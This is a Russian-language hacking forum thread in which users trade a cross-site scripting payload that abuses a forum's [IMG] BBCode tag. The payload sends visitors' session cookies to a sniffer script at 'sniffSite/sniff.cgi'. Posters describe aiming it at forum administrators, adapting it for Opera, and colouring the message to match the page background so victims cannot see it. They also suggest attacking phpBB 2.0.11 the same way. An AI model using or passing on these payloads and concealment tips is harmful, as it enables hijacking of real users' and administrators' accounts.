http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[68].src="http://sniffSite/sniff.cgi?"+document.cookie)

послал админам в личку, потом был забанен....
потом доперло , что у админов опера,
так он и есть

отображение хсс в опере

'>` style=background:url(javascript:document.images[1].src="sniff?"+document.cookie)

как сделать чтоб хотябы код не было видно ?

Внимательней читай коменты...
Егорыч++++

Совет. Поскольку, уязвимость не работает в других браузерах, то в Опере или Firefox видится всякая абракадабра. Этим можно выдать себя. Для того , чтоб себя не выдать можно покрасить сообщение под цвет фона.

http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.ima
ges[68].src="http://sniffSite/sniff.cgi?"+document.cookie)

Примерно так...

ой 8) не корректно отобразилось...


http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.ima
ges[68].src="http://sniffSite/sniff.cgi?"+document.cookie)

Вот и все...я уже давно допер,как их скрыть!

Кстати, если хорошо подумать, то эту уязвимость можно адаптировать и под оперу...Без использования обратной кавычки

да 8) А еще если хорошо подумать мона и Phpbb 2.0.11 через Xss ломануть 8)